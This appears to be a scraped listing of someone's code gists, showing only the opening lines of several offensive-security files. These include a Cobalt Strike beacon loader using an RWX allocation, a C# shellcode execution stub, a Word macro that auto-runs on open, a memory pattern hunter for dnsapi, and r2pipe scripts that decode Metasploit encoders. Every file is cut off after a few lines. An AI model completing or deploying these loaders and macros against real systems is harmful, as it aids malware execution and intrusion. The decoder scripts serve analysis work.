This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <libusb-1.0/libusb.h> | |
void printdev(libusb_device *dev) { | |
struct libusb_device_descriptor desc; | |
struct libusb_config_descriptor *config; | |
struct libusb_interface_descriptor *interdesc; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
typedef unsigned int DWORD; | |
typedef unsigned char BYTE; | |
typedef unsigned char * PBYTE; | |
typedef DWORD HRESULT; | |
typedef unsigned short USHORT; | |
typedef unsigned int ULONG; | |
typedef unsigned char UCHAR; | |
typedef bool BOOL; | |
static const DWORD kCurrentMajorVersion = 2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from scapy.all import * | |
from scapy.utils import rdpcap | |
import sys | |
import struct | |
from pwn import * | |
MESSAGE_TYPE_SYN = 0x00 | |
MESSAGE_TYPE_MSG = 0x1 | |
MESSAGE_TYPE_PING = 0xFF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder | |
# https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/countdown.rb | |
import r2pipe | |
import sys | |
def dump(addr): | |
pass | |
def startEsil(): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
void spawnBeacon(char *payload, DWORD len) { | |
HANDLE threadHandle; | |
DWORD threadId = 0; | |
char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
memcpy(alloc, payload, len); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder | |
import r2pipe | |
import sys | |
def dump(addr): | |
pass | |
def startEsil(): | |
r.cmd('e io.cache=true') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace NautilusProject | |
{ | |
public class ExecStubOverwriteWithoutPInvoke | |
{ | |
public static void Execute(byte[] shellcode) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <Windows.h> | |
#include <WinDNS.h> | |
// Pattern for hunting dnsapi!McTemplateU0zqxqz | |
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
#define PATTERN_LEN 14 | |
// Search for pattern in memory | |
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Attribute VB_Name = "ThisDocument" | |
Attribute VB_Base = "1Normal.ThisDocument" | |
Attribute VB_GlobalNameSpace = False | |
Attribute VB_Creatable = False | |
Attribute VB_PredeclaredId = True | |
Attribute VB_Exposed = True | |
Attribute VB_TemplateDerived = True | |
Attribute VB_Customizable = True | |
Sub AutoOpen() | |
Execute |